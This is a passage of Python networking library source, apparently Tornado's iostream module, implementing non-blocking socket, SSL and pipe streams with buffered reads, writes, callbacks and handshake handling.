self._run_read_callback(self._read_buffer_size, True)
self._run_read_callback(self._read_buffer_size, False)
return future
self._read_until_close = True
try:
self._try_inline_read()
except:
if future is not None:
future.add_done_callback(lambda f: f.exception())
raise
return future
def write(self, data, callback=None):
"""Asynchronously write the given data to this stream.
If ``callback`` is given, we call it when all of the buffered write
data has been successfully written to the stream. If there was
previously buffered write data and an old write callback, that
callback is simply overwritten with this new callback.
If no ``callback`` is given, this method returns a `.Future` that
resolves (with a result of ``None``) when the write has been
completed. If `write` is called again before that `.Future` has
resolved, the previous future will be orphaned and will never resolve.
.. versionchanged:: 4.0
Now returns a `.Future` if no callback is given.
"""
assert isinstance(data, bytes)
self._check_closed()
# We use bool(_write_buffer) as a proxy for write_buffer_size>0,
# so never put empty strings in the buffer.
if data:
if (self.max_write_buffer_size is not None and
self._write_buffer_size + len(data) > self.max_write_buffer_size):
raise StreamBufferFullError("Reached maximum write buffer size")
# Break up large contiguous strings before inserting them in the
# write buffer, so we don't have to recopy the entire thing
# as we slice off pieces to send to the socket.
WRITE_BUFFER_CHUNK_SIZE = 128 * 1024
for i in range(0, len(data), WRITE_BUFFER_CHUNK_SIZE):
self._write_buffer.append(data[i:i + WRITE_BUFFER_CHUNK_SIZE])
self._write_buffer_size += len(data)
if callback is not None:
self._write_callback = stack_context.wrap(callback)
future = None
else:
future = self._write_future = TracebackFuture()
future.add_done_callback(lambda f: f.exception())
if not self._connecting:
self._handle_write()
if self._write_buffer:
self._add_io_state(self.io_loop.WRITE)
self._maybe_add_error_listener()
return future
def set_close_callback(self, callback):
"""Call the given callback when the stream is closed.
This is not necessary for applications that use the `.Future`
interface; all outstanding ``Futures`` will resolve with a
`StreamClosedError` when the stream is closed.
"""
self._close_callback = stack_context.wrap(callback)
self._maybe_add_error_listener()
def close(self, exc_info=False):
"""Close this stream.
If ``exc_info`` is true, set the ``error`` attribute to the current
exception from `sys.exc_info` (or if ``exc_info`` is a tuple,
use that instead of `sys.exc_info`).
"""
if not self.closed():
if exc_info:
if not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
if any(exc_info):
self.error = exc_info[1]
if self._read_until_close:
if (self._streaming_callback is not None and
self._read_buffer_size):
self._run_read_callback(self._read_buffer_size, True)
self._read_until_close = False
self._run_read_callback(self._read_buffer_size, False)
if self._state is not None:
self.io_loop.remove_handler(self.fileno())
self._state = None
self.close_fd()
self._closed = True
self._maybe_run_close_callback()
def _maybe_run_close_callback(self):
# If there are pending callbacks, don't run the close callback
# until they're done (see _maybe_add_error_handler)
if self.closed() and self._pending_callbacks == 0:
futures = []
if self._read_future is not None:
futures.append(self._read_future)
self._read_future = None
if self._write_future is not None:
futures.append(self._write_future)
self._write_future = None
if self._connect_future is not None:
futures.append(self._connect_future)
self._connect_future = None
if self._ssl_connect_future is not None:
futures.append(self._ssl_connect_future)
self._ssl_connect_future = None
for future in futures:
future.set_exception(StreamClosedError(real_error=self.error))
if self._close_callback is not None:
cb = self._close_callback
self._close_callback = None
self._run_callback(cb)
# Delete any unfinished callbacks to break up reference cycles.
self._read_callback = self._write_callback = None
# Clear the buffers so they can be cleared immediately even
# if the IOStream object is kept alive by a reference cycle.
# TODO: Clear the read buffer too; it currently breaks some tests.
self._write_buffer = None
def reading(self):
"""Returns true if we are currently reading from the stream."""
return self._read_callback is not None or self._read_future is not None
def writing(self):
"""Returns true if we are currently writing to the stream."""
return bool(self._write_buffer)
def closed(self):
"""Returns true if the stream has been closed."""
return self._closed
def set_nodelay(self, value):
"""Sets the no-delay flag for this stream.
By default, data written to TCP streams may be held for a time
to make the most efficient use of bandwidth (according to
Nagle's algorithm). The no-delay flag requests that data be
written as soon as possible, even if doing so would consume
additional bandwidth.
This flag is currently defined only for TCP-based ``IOStreams``.
.. versionadded:: 3.1
"""
pass
def _handle_events(self, fd, events):
if self.closed():
gen_log.warning("Got events for closed stream %s", fd)
return
try:
if self._connecting:
# Most IOLoops will report a write failed connect
# with the WRITE event, but SelectIOLoop reports a
# READ as well so we must check for connecting before
# either.
self._handle_connect()
if self.closed():
return
if events & self.io_loop.READ:
self._handle_read()
if self.closed():
return
if events & self.io_loop.WRITE:
self._handle_write()
if self.closed():
return
if events & self.io_loop.ERROR:
self.error = self.get_fd_error()
# We may have queued up a user callback in _handle_read or
# _handle_write, so don't close the IOStream until those
# callbacks have had a chance to run.
self.io_loop.add_callback(self.close)
return
state = self.io_loop.ERROR
if self.reading():
state |= self.io_loop.READ
if self.writing():
state |= self.io_loop.WRITE
if state == self.io_loop.ERROR and self._read_buffer_size == 0:
# If the connection is idle, listen for reads too so
# we can tell if the connection is closed. If there is
# data in the read buffer we won't run the close callback
# yet anyway, so we don't need to listen in this case.
state |= self.io_loop.READ
if state != self._state:
assert self._state is not None, \
"shouldn't happen: _handle_events without self._state"
self._state = state
self.io_loop.update_handler(self.fileno(), self._state)
except UnsatisfiableReadError as e:
gen_log.info("Unsatisfiable read, closing connection: %s" % e)
self.close(exc_info=True)
except Exception:
gen_log.error("Uncaught exception, closing connection.",
exc_info=True)
self.close(exc_info=True)
raise
def _run_callback(self, callback, *args):
def wrapper():
self._pending_callbacks -= 1
try:
return callback(*args)
except Exception:
app_log.error("Uncaught exception, closing connection.",
exc_info=True)
# Close the socket on an uncaught exception from a user callback
# (It would eventually get closed when the socket object is
# gc'd, but we don't want to rely on gc happening before we
# run out of file descriptors)
self.close(exc_info=True)
# Re-raise the exception so that IOLoop.handle_callback_exception
# can see it and log the error
raise
finally:
self._maybe_add_error_listener()
# We schedule callbacks to be run on the next IOLoop iteration
# rather than running them directly for several reasons:
# * Prevents unbounded stack growth when a callback calls an
# IOLoop operation that immediately runs another callback
# * Provides a predictable execution context for e.g.
# non-reentrant mutexes
# * Ensures that the try/except in wrapper() is run outside
# of the application's StackContexts
with stack_context.NullContext():
# stack_context was already captured in callback, we don't need to
# capture it again for IOStream's wrapper. This is especially
# important if the callback was pre-wrapped before entry to
# IOStream (as in HTTPConnection._header_callback), as we could
# capture and leak the wrong context here.
self._pending_callbacks += 1
self.io_loop.add_callback(wrapper)
def _read_to_buffer_loop(self):
# This method is called from _handle_read and _try_inline_read.
try:
if self._read_bytes is not None:
target_bytes = self._read_bytes
elif self._read_max_bytes is not None:
target_bytes = self._read_max_bytes
elif self.reading():
# For read_until without max_bytes, or
# read_until_close, read as much as we can before
# scanning for the delimiter.
target_bytes = None
else:
target_bytes = 0
next_find_pos = 0
# Pretend to have a pending callback so that an EOF in
# _read_to_buffer doesn't trigger an immediate close
# callback. At the end of this method we'll either
# establish a real pending callback via
# _read_from_buffer or run the close callback.
#
# We need two try statements here so that
# pending_callbacks is decremented before the `except`
# clause below (which calls `close` and does need to
# trigger the callback)
self._pending_callbacks += 1
while not self.closed():
# Read from the socket until we get EWOULDBLOCK or equivalent.
# SSL sockets do some internal buffering, and if the data is
# sitting in the SSL object's buffer select() and friends
# can't see it; the only way to find out if it's there is to
# try to read it.
if self._read_to_buffer() == 0:
break
self._run_streaming_callback()
# If we've read all the bytes we can use, break out of
# this loop. We can't just call read_from_buffer here
# because of subtle interactions with the
# pending_callback and error_listener mechanisms.
#
# If we've reached target_bytes, we know we're done.
if (target_bytes is not None and
self._read_buffer_size >= target_bytes):
break
# Otherwise, we need to call the more expensive find_read_pos.
# It's inefficient to do this on every read, so instead
# do it on the first read and whenever the read buffer
# size has doubled.
if self._read_buffer_size >= next_find_pos:
pos = self._find_read_pos()
if pos is not None:
return pos
next_find_pos = self._read_buffer_size * 2
return self._find_read_pos()
finally:
self._pending_callbacks -= 1
def _handle_read(self):
try:
pos = self._read_to_buffer_loop()
except UnsatisfiableReadError:
raise
except Exception as e:
if 1 != e.errno:
gen_log.warning("error on read: %s" % e)
self.close(exc_info=True)
return
if pos is not None:
self._read_from_buffer(pos)
return
else:
self._maybe_run_close_callback()
def _set_read_callback(self, callback):
assert self._read_callback is None, "Already reading"
assert self._read_future is None, "Already reading"
if callback is not None:
self._read_callback = stack_context.wrap(callback)
else:
self._read_future = TracebackFuture()
return self._read_future
def _run_read_callback(self, size, streaming):
if streaming:
callback = self._streaming_callback
else:
callback = self._read_callback
self._read_callback = self._streaming_callback = None
if self._read_future is not None:
assert callback is None
future = self._read_future
self._read_future = None
future.set_result(self._consume(size))
if callback is not None:
assert (self._read_future is None) or streaming
self._run_callback(callback, self._consume(size))
else:
# If we scheduled a callback, we will add the error listener
# afterwards. If we didn't, we have to do it now.
self._maybe_add_error_listener()
def _try_inline_read(self):
"""Attempt to complete the current read operation from buffered data.
If the read can be completed without blocking, schedules the
read callback on the next IOLoop iteration; otherwise starts
listening for reads on the socket.
"""
# See if we've already got the data from a previous read
self._run_streaming_callback()
pos = self._find_read_pos()
if pos is not None:
self._read_from_buffer(pos)
return
self._check_closed()
try:
pos = self._read_to_buffer_loop()
except Exception:
# If there was an in _read_to_buffer, we called close() already,
# but couldn't run the close callback because of _pending_callbacks.
# Before we escape from this function, run the close callback if
# applicable.
self._maybe_run_close_callback()
raise
if pos is not None:
self._read_from_buffer(pos)
return
# We couldn't satisfy the read inline, so either close the stream
# or listen for new data.
if self.closed():
self._maybe_run_close_callback()
else:
self._add_io_state(ioloop.IOLoop.READ)
def _read_to_buffer(self):
"""Reads from the socket and appends the result to the read buffer.
Returns the number of bytes read. Returns 0 if there is nothing
to read (i.e. the read returns EWOULDBLOCK or equivalent). On
error closes the socket and raises an exception.
"""
while True:
try:
chunk = self.read_from_fd()
except (socket.error, IOError, OSError) as e:
if errno_from_exception(e) == errno.EINTR:
continue
# ssl.SSLError is a subclass of socket.error
if self._is_connreset(e):
# Treat ECONNRESET as a connection close rather than
# an error to minimize log spam (the exception will
# be available on self.error for apps that care).
self.close(exc_info=True)
return
self.close(exc_info=True)
raise
break
if chunk is None:
return 0
self._read_buffer.append(chunk)
self._read_buffer_size += len(chunk)
if self._read_buffer_size > self.max_buffer_size:
gen_log.error("Reached maximum read buffer size")
self.close()
raise StreamBufferFullError("Reached maximum read buffer size")
return len(chunk)
def _run_streaming_callback(self):
if self._streaming_callback is not None and self._read_buffer_size:
bytes_to_consume = self._read_buffer_size
if self._read_bytes is not None:
bytes_to_consume = min(self._read_bytes, bytes_to_consume)
self._read_bytes -= bytes_to_consume
self._run_read_callback(bytes_to_consume, True)
def _read_from_buffer(self, pos):
"""Attempts to complete the currently-pending read from the buffer.
The argument is either a position in the read buffer or None,
as returned by _find_read_pos.
"""
self._read_bytes = self._read_delimiter = self._read_regex = None
self._read_partial = False
self._run_read_callback(pos, False)
def _find_read_pos(self):
"""Attempts to find a position in the read buffer that satisfies
the currently-pending read.
Returns a position in the buffer if the current read can be satisfied,
or None if it cannot.
"""
if (self._read_bytes is not None and
(self._read_buffer_size >= self._read_bytes or
(self._read_partial and self._read_buffer_size > 0))):
num_bytes = min(self._read_bytes, self._read_buffer_size)
return num_bytes
elif self._read_delimiter is not None:
# Multi-byte delimiters (e.g. '\r\n') may straddle two
# chunks in the read buffer, so we can't easily find them
# without collapsing the buffer. However, since protocols
# using delimited reads (as opposed to reads of a known
# length) tend to be "line" oriented, the delimiter is likely
# to be in the first few chunks. Merge the buffer gradually
# since large merges are relatively expensive and get undone in
# _consume().
if self._read_buffer:
while True:
loc = self._read_buffer[0].find(self._read_delimiter)
if loc != -1:
delimiter_len = len(self._read_delimiter)
self._check_max_bytes(self._read_delimiter,
loc + delimiter_len)
return loc + delimiter_len
if len(self._read_buffer) == 1:
break
_double_prefix(self._read_buffer)
self._check_max_bytes(self._read_delimiter,
len(self._read_buffer[0]))
elif self._read_regex is not None:
if self._read_buffer:
while True:
m = self._read_regex.search(self._read_buffer[0])
if m is not None:
self._check_max_bytes(self._read_regex, m.end())
return m.end()
if len(self._read_buffer) == 1:
break
_double_prefix(self._read_buffer)
self._check_max_bytes(self._read_regex,
len(self._read_buffer[0]))
return None
def _check_max_bytes(self, delimiter, size):
if (self._read_max_bytes is not None and
size > self._read_max_bytes):
raise UnsatisfiableReadError(
"delimiter %r not found within %d bytes" % (
delimiter, self._read_max_bytes))
def _handle_write(self):
while self._write_buffer:
try:
if not self._write_buffer_frozen:
# On windows, socket.send blows up if given a
# write buffer that's too large, instead of just
# returning the number of bytes it was able to
# process. Therefore we must not call socket.send
# with more than 128KB at a time.
_merge_prefix(self._write_buffer, 128 * 1024)
num_bytes = self.write_to_fd(self._write_buffer[0])
if num_bytes == 0:
# With OpenSSL, if we couldn't write the entire buffer,
# the very same string object must be used on the
# next call to send. Therefore we suppress
# merging the write buffer after an incomplete send.
# A cleaner solution would be to set
# SSL_MODE_ACCEPT_MOVING_WRITE_BUFFER, but this is
# not yet accessible from python
# (http://bugs.python.org/issue8240)
self._write_buffer_frozen = True
break
self._write_buffer_frozen = False
_merge_prefix(self._write_buffer, num_bytes)
self._write_buffer.popleft()
self._write_buffer_size -= num_bytes
except (socket.error, IOError, OSError) as e:
if e.args[0] in _ERRNO_WOULDBLOCK:
self._write_buffer_frozen = True
break
else:
if not self._is_connreset(e):
# Broken pipe errors are usually caused by connection
# reset, and its better to not log EPIPE errors to
# minimize log spam
gen_log.warning("Write error on %s: %s",
self.fileno(), e)
self.close(exc_info=True)
return
if not self._write_buffer:
if self._write_callback:
callback = self._write_callback
self._write_callback = None
self._run_callback(callback)
if self._write_future:
future = self._write_future
self._write_future = None
future.set_result(None)
def _consume(self, loc):
if loc == 0:
return b""
_merge_prefix(self._read_buffer, loc)
self._read_buffer_size -= loc
return self._read_buffer.popleft()
def _check_closed(self):
if self.closed():
raise StreamClosedError(real_error=self.error)
def _maybe_add_error_listener(self):
# This method is part of an optimization: to detect a connection that
# is closed when we're not actively reading or writing, we must listen
# for read events. However, it is inefficient to do this when the
# connection is first established because we are going to read or write
# immediately anyway. Instead, we insert checks at various times to
# see if the connection is idle and add the read listener then.
if self._pending_callbacks != 0:
return
if self._state is None or self._state == ioloop.IOLoop.ERROR:
if self.closed():
self._maybe_run_close_callback()
elif (self._read_buffer_size == 0 and
self._close_callback is not None):
self._add_io_state(ioloop.IOLoop.READ)
def _add_io_state(self, state):
"""Adds `state` (IOLoop.{READ,WRITE} flags) to our event handler.
Implementation notes: Reads and writes have a fast path and a
slow path. The fast path reads synchronously from socket
buffers, while the slow path uses `_add_io_state` to schedule
an IOLoop callback. Note that in both cases, the callback is
run asynchronously with `_run_callback`.
To detect closed connections, we must have called
`_add_io_state` at some point, but we want to delay this as
much as possible so we don't have to set an `IOLoop.ERROR`
listener that will be overwritten by the next slow-path
operation. As long as there are callbacks scheduled for
fast-path ops, those callbacks may do more reads.
If a sequence of fast-path ops do not end in a slow-path op,
(e.g. for an @asynchronous long-poll request), we must add
the error handler. This is done in `_run_callback` and `write`
(since the write callback is optional so we can have a
fast-path write with no `_run_callback`)
"""
if self.closed():
# connection has been closed, so there can be no future events
return
if self._state is None:
self._state = ioloop.IOLoop.ERROR | state
with stack_context.NullContext():
self.io_loop.add_handler(
self.fileno(), self._handle_events, self._state)
elif not self._state & state:
self._state = self._state | state
self.io_loop.update_handler(self.fileno(), self._state)
def _is_connreset(self, exc):
"""Return true if exc is ECONNRESET or equivalent.
May be overridden in subclasses.
"""
return (isinstance(exc, (socket.error, IOError)) and
errno_from_exception(exc) in _ERRNO_CONNRESET)
class IOStream(BaseIOStream):
r"""Socket-based `IOStream` implementation.
This class supports the read and write methods from `BaseIOStream`
plus a `connect` method.
The ``socket`` parameter may either be connected or unconnected.
For server operations the socket is the result of calling
`socket.accept <socket.socket.accept>`. For client operations the
socket is created with `socket.socket`, and may either be
connected before passing it to the `IOStream` or connected with
`IOStream.connect`.
A very simple (and broken) HTTP client using this class:
.. testcode::
import tornado.ioloop
import tornado.iostream
import socket
def send_request():
stream.write(b"GET / HTTP/1.0\r\nHost: friendfeed.com\r\n\r\n")
stream.read_until(b"\r\n\r\n", on_headers)
def on_headers(data):
headers = {}
for line in data.split(b"\r\n"):
parts = line.split(b":")
if len(parts) == 2:
headers[parts[0].strip()] = parts[1].strip()
stream.read_bytes(int(headers[b"Content-Length"]), on_body)
def on_body(data):
print(data)
stream.close()
tornado.ioloop.IOLoop.current().stop()
if __name__ == '__main__':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
stream = tornado.iostream.IOStream(s)
stream.connect(("friendfeed.com", 80), send_request)
tornado.ioloop.IOLoop.current().start()
.. testoutput::
:hide:
"""
def __init__(self, socket, *args, **kwargs):
self.socket = socket
self.socket.setblocking(False)
super(IOStream, self).__init__(*args, **kwargs)
def fileno(self):
return self.socket
def close_fd(self):
self.socket.close()
self.socket = None
def get_fd_error(self):
errno = self.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_ERROR)
return socket.error(errno, os.strerror(errno))
def read_from_fd(self):
try:
chunk = self.socket.recv(self.read_chunk_size)
except socket.error as e:
if e.args[0] in _ERRNO_WOULDBLOCK:
return None
else:
raise
if not chunk:
self.close()
return None
return chunk
def write_to_fd(self, data):
return self.socket.send(data)
def connect(self, address, callback=None, server_hostname=None):
"""Connects the socket to a remote address without blocking.
May only be called if the socket passed to the constructor was
not previously connected. The address parameter is in the
same format as for `socket.connect <socket.socket.connect>` for
the type of socket passed to the IOStream constructor,
e.g. an ``(ip, port)`` tuple. Hostnames are accepted here,
but will be resolved synchronously and block the IOLoop.
If you have a hostname instead of an IP address, the `.TCPClient`
class is recommended instead of calling this method directly.
`.TCPClient` will do asynchronous DNS resolution and handle
both IPv4 and IPv6.
If ``callback`` is specified, it will be called with no
arguments when the connection is completed; if not this method
returns a `.Future` (whose result after a successful
connection will be the stream itself).
In SSL mode, the ``server_hostname`` parameter will be used
for certificate validation (unless disabled in the
``ssl_options``) and SNI (if supported; requires Python
2.7.9+).
Note that it is safe to call `IOStream.write
<BaseIOStream.write>` while the connection is pending, in
which case the data will be written as soon as the connection
is ready. Calling `IOStream` read methods before the socket is
connected works on some platforms but is non-portable.
.. versionchanged:: 4.0
If no callback is given, returns a `.Future`.
.. versionchanged:: 4.2
SSL certificates are validated by default; pass
``ssl_options=dict(cert_reqs=ssl.CERT_NONE)`` or a
suitably-configured `ssl.SSLContext` to the
`SSLIOStream` constructor to disable.
"""
self._connecting = True
if callback is not None:
self._connect_callback = stack_context.wrap(callback)
future = None
else:
future = self._connect_future = TracebackFuture()
try:
self.socket.connect(address)
except socket.error as e:
# In non-blocking mode we expect connect() to raise an
# exception with EINPROGRESS or EWOULDBLOCK.
#
# On freebsd, other errors such as ECONNREFUSED may be
# returned immediately when attempting to connect to
# localhost, so handle them the same way as an error
# reported later in _handle_connect.
if (errno_from_exception(e) not in _ERRNO_INPROGRESS and
errno_from_exception(e) not in _ERRNO_WOULDBLOCK):
if future is None:
gen_log.warning("Connect error on fd %s: %s",
self.socket.fileno(), e)
self.close(exc_info=True)
return future
self._add_io_state(self.io_loop.WRITE)
return future
def start_tls(self, server_side, ssl_options=None, server_hostname=None):
"""Convert this `IOStream` to an `SSLIOStream`.
This enables protocols that begin in clear-text mode and
switch to SSL after some initial negotiation (such as the
``STARTTLS`` extension to SMTP and IMAP).
This method cannot be used if there are outstanding reads
or writes on the stream, or if there is any data in the
IOStream's buffer (data in the operating system's socket
buffer is allowed). This means it must generally be used
immediately after reading or writing the last clear-text
data. It can also be used immediately after connecting,
before any reads or writes.
The ``ssl_options`` argument may be either an `ssl.SSLContext`
object or a dictionary of keyword arguments for the
`ssl.wrap_socket` function. The ``server_hostname`` argument
will be used for certificate validation unless disabled
in the ``ssl_options``.
This method returns a `.Future` whose result is the new
`SSLIOStream`. After this method has been called,
any other operation on the original stream is undefined.
If a close callback is defined on this stream, it will be
transferred to the new stream.
.. versionadded:: 4.0
.. versionchanged:: 4.2
SSL certificates are validated by default; pass
``ssl_options=dict(cert_reqs=ssl.CERT_NONE)`` or a
suitably-configured `ssl.SSLContext` to disable.
"""
if (self._read_callback or self._read_future or
self._write_callback or self._write_future or
self._connect_callback or self._connect_future or
self._pending_callbacks or self._closed or
self._read_buffer or self._write_buffer):
raise ValueError("IOStream is not idle; cannot convert to SSL")
if ssl_options is None:
if server_side:
ssl_options = _server_ssl_defaults
else:
ssl_options = _client_ssl_defaults
socket = self.socket
self.io_loop.remove_handler(socket)
self.socket = None
socket = ssl_wrap_socket(socket, ssl_options,
server_hostname=server_hostname,
server_side=server_side,
do_handshake_on_connect=False)
orig_close_callback = self._close_callback
self._close_callback = None
future = TracebackFuture()
ssl_stream = SSLIOStream(socket, ssl_options=ssl_options,
io_loop=self.io_loop)
# Wrap the original close callback so we can fail our Future as well.
# If we had an "unwrap" counterpart to this method we would need
# to restore the original callback after our Future resolves
# so that repeated wrap/unwrap calls don't build up layers.
def close_callback():
if not future.done():
# Note that unlike most Futures returned by IOStream,
# this one passes the underlying error through directly
# instead of wrapping everything in a StreamClosedError
# with a real_error attribute. This is because once the
# connection is established it's more helpful to raise
# the SSLError directly than to hide it behind a
# StreamClosedError (and the client is expecting SSL
# issues rather than network issues since this method is
# named start_tls).
future.set_exception(ssl_stream.error or StreamClosedError())
if orig_close_callback is not None:
orig_close_callback()
ssl_stream.set_close_callback(close_callback)
ssl_stream._ssl_connect_callback = lambda: future.set_result(ssl_stream)
ssl_stream.max_buffer_size = self.max_buffer_size
ssl_stream.read_chunk_size = self.read_chunk_size
return future
def _handle_connect(self):
err = self.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
if err != 0:
self.error = socket.error(err, os.strerror(err))
# IOLoop implementations may vary: some of them return
# an error state before the socket becomes writable, so
# in that case a connection failure would be handled by the
# error path in _handle_events instead of here.
if self._connect_future is None:
gen_log.warning("Connect error on fd %s: %s",
self.socket.fileno(), errno.errorcode[err])
self.close()
return
if self._connect_callback is not None:
callback = self._connect_callback
self._connect_callback = None
self._run_callback(callback)
if self._connect_future is not None:
future = self._connect_future
self._connect_future = None
future.set_result(self)
self._connecting = False
def set_nodelay(self, value):
if (self.socket is not None and
self.socket.family in (socket.AF_INET, socket.AF_INET6)):
try:
self.socket.setsockopt(socket.IPPROTO_TCP,
socket.TCP_NODELAY, 1 if value else 0)
except socket.error as e:
# Sometimes setsockopt will fail if the socket is closed
# at the wrong time. This can happen with HTTPServer
# resetting the value to false between requests.
if e.errno != errno.EINVAL and not self._is_connreset(e):
raise
class SSLIOStream(IOStream):
"""A utility class to write to and read from a non-blocking SSL socket.
If the socket passed to the constructor is already connected,
it should be wrapped with::
ssl.wrap_socket(sock, do_handshake_on_connect=False, **kwargs)
before constructing the `SSLIOStream`. Unconnected sockets will be
wrapped when `IOStream.connect` is finished.
"""
def __init__(self, *args, **kwargs):
"""The ``ssl_options`` keyword argument may either be an
`ssl.SSLContext` object or a dictionary of keywords arguments
for `ssl.wrap_socket`
"""
self._ssl_options = kwargs.pop('ssl_options', _client_ssl_defaults)
super(SSLIOStream, self).__init__(*args, **kwargs)
self._ssl_accepting = True
self._handshake_reading = False
self._handshake_writing = False
self._ssl_connect_callback = None
self._server_hostname = None
# If the socket is already connected, attempt to start the handshake.
try:
self.socket.getpeername()
except socket.error:
pass
else:
# Indirectly start the handshake, which will run on the next
# IOLoop iteration and then the real IO state will be set in
# _handle_events.
self._add_io_state(self.io_loop.WRITE)
def reading(self):
return self._handshake_reading or super(SSLIOStream, self).reading()
def writing(self):
return self._handshake_writing or super(SSLIOStream, self).writing()
def _do_ssl_handshake(self):
# Based on code from test_ssl.py in the python stdlib
try:
self._handshake_reading = False
self._handshake_writing = False
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
self._handshake_reading = True
return
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
self._handshake_writing = True
return
elif err.args[0] in (ssl.SSL_ERROR_EOF,
ssl.SSL_ERROR_ZERO_RETURN):
return self.close(exc_info=True)
elif err.args[0] == ssl.SSL_ERROR_SSL:
try:
peer = self.socket.getpeername()
except Exception:
peer = '(not connected)'
gen_log.warning("SSL Error on %s %s: %s",
self.socket.fileno(), peer, err)
return self.close(exc_info=True)
raise
except socket.error as err:
# Some port scans (e.g. nmap in -sT mode) have been known
# to cause do_handshake to raise EBADF and ENOTCONN, so make
# those errors quiet as well.
# https://groups.google.com/forum/?fromgroups#!topic/python-tornado/ApucKJat1_0
if (self._is_connreset(err) or
err.args[0] in (errno.EBADF, errno.ENOTCONN)):
return self.close(exc_info=True)
raise
except AttributeError:
# On Linux, if the connection was reset before the call to
# wrap_socket, do_handshake will fail with an
# AttributeError.
return self.close(exc_info=True)
else:
self._ssl_accepting = False
if not self._verify_cert(self.socket.getpeercert()):
self.close()
return
self._run_ssl_connect_callback()
def _run_ssl_connect_callback(self):
if self._ssl_connect_callback is not None:
callback = self._ssl_connect_callback
self._ssl_connect_callback = None
self._run_callback(callback)
if self._ssl_connect_future is not None:
future = self._ssl_connect_future
self._ssl_connect_future = None
future.set_result(self)
def _verify_cert(self, peercert):
"""Returns True if peercert is valid according to the configured
validation mode and hostname.
The ssl handshake already tested the certificate for a valid
CA signature; the only thing that remains is to check
the hostname.
"""
if isinstance(self._ssl_options, dict):
verify_mode = self._ssl_options.get('cert_reqs', ssl.CERT_NONE)
elif isinstance(self._ssl_options, ssl.SSLContext):
verify_mode = self._ssl_options.verify_mode
assert verify_mode in (ssl.CERT_NONE, ssl.CERT_REQUIRED, ssl.CERT_OPTIONAL)
if verify_mode == ssl.CERT_NONE or self._server_hostname is None:
return True
cert = self.socket.getpeercert()
if cert is None and verify_mode == ssl.CERT_REQUIRED:
gen_log.warning("No SSL certificate given")
return False
try:
ssl_match_hostname(peercert, self._server_hostname)
except SSLCertificateError as e:
gen_log.warning("Invalid SSL certificate: %s" % e)
return False
else:
return True
def _handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
return
super(SSLIOStream, self)._handle_read()
def _handle_write(self):
if self._ssl_accepting:
self._do_ssl_handshake()
return
super(SSLIOStream, self)._handle_write()
def connect(self, address, callback=None, server_hostname=None):
self._server_hostname = server_hostname
# Pass a dummy callback to super.connect(), which is slightly
# more efficient than letting it return a Future we ignore.
super(SSLIOStream, self).connect(address, callback=lambda: None)
return self.wait_for_handshake(callback)
def _handle_connect(self):
# Call the superclass method to check for errors.
super(SSLIOStream, self)._handle_connect()
if self.closed():
return
# When the connection is complete, wrap the socket for SSL
# traffic. Note that we do this by overriding _handle_connect
# instead of by passing a callback to super().connect because
# user callbacks are enqueued asynchronously on the IOLoop,
# but since _handle_events calls _handle_connect immediately
# followed by _handle_write we need this to be synchronous.
#
# The IOLoop will get confused if we swap out self.socket while the
# fd is registered, so remove it now and re-register after
# wrap_socket().
self.io_loop.remove_handler(self.socket)
old_state = self._state
self._state = None
self.socket = ssl_wrap_socket(self.socket, self._ssl_options,
server_hostname=self._server_hostname,
do_handshake_on_connect=False)
self._add_io_state(old_state)
def wait_for_handshake(self, callback=None):
"""Wait for the initial SSL handshake to complete.
If a ``callback`` is given, it will be called with no
arguments once the handshake is complete; otherwise this
method returns a `.Future` which will resolve to the
stream itself after the handshake is complete.
Once the handshake is complete, information such as
the peer's certificate and NPN/ALPN selections may be
accessed on ``self.socket``.
This method is intended for use on server-side streams
or after using `IOStream.start_tls`; it should not be used
with `IOStream.connect` (which already waits for the
handshake to complete). It may only be called once per stream.
.. versionadded:: 4.2
"""
if (self._ssl_connect_callback is not None or
self._ssl_connect_future is not None):
raise RuntimeError("Already waiting")
if callback is not None:
self._ssl_connect_callback = stack_context.wrap(callback)
future = None
else:
future = self._ssl_connect_future = TracebackFuture()
if not self._ssl_accepting:
self._run_ssl_connect_callback()
return future
def write_to_fd(self, data):
try:
return self.socket.send(data)
except ssl.SSLError as e:
if e.args[0] == ssl.SSL_ERROR_WANT_WRITE:
# In Python 3.5+, SSLSocket.send raises a WANT_WRITE error if
# the socket is not writeable; we need to transform this into
# an EWOULDBLOCK socket.error or a zero return value,
# either of which will be recognized by the caller of this
# method. Prior to Python 3.5, an unwriteable socket would
# simply return 0 bytes written.
return 0
raise
def read_from_fd(self):
if self._ssl_accepting:
# If the handshake hasn't finished yet, there can't be anything
# to read (attempting to read may or may not raise an exception
# depending on the SSL version)
return None
try:
# SSLSocket objects have both a read() and recv() method,
# while regular sockets only have recv().
# The recv() method blocks (at least in python 2.6) if it is
# called when there is nothing to read, so we have to use
# read() instead.
chunk = self.socket.read(self.read_chunk_size)
except ssl.SSLError as e:
# SSLError is a subclass of socket.error, so this except
# block must come first.
if e.args[0] == ssl.SSL_ERROR_WANT_READ:
return None
else:
raise
except socket.error as e:
if e.args[0] in _ERRNO_WOULDBLOCK:
return None
else:
raise
if not chunk:
self.close()
return None
return chunk
def _is_connreset(self, e):
if isinstance(e, ssl.SSLError) and e.args[0] == ssl.SSL_ERROR_EOF:
return True
return super(SSLIOStream, self)._is_connreset(e)
class PipeIOStream(BaseIOStream):
"""Pipe-based `IOStream` implementation.
The constructor takes an integer file descriptor (such as one returned
by `os.pipe`) rather than an open file object. Pipes are generally
one-way, so a `PipeIOStream` can be used for reading or writing but not
both.
"""
def __init__(self, fd, *args, **kwargs):
self.fd = fd
_set_nonblocking(fd)
super(PipeIOStream, self).__init__(*args, **kwargs)
def fileno(self):
return self.fd
def close_fd(self):
os.close(self.fd)
def write_to_fd(self, data):
return os.write(self.fd, data)
def read_from_fd(self):
try:
chunk = os.read(self.fd, self.read_chunk_size)
except (IOError, OSError) as e:
if errno_from_exception(e) in _ERRNO_WOULDBLOCK:
return None
elif errno_from_exception(e) == errno.EBADF:
# If the writing half of a pipe is closed, select will
# report it as readable but reads will fail with EBADF.
self.close(exc_info=True)
return None
else:
raise
if not chunk:
self.close()
return None
return chunk
def _double_prefix(deque):
"""Grow by doubling, but don't split the second chunk just because the
first one is small.
"""
new_len = max(len(deque[0]) * 2,
(len(deque[0]) + len(deque[1])))
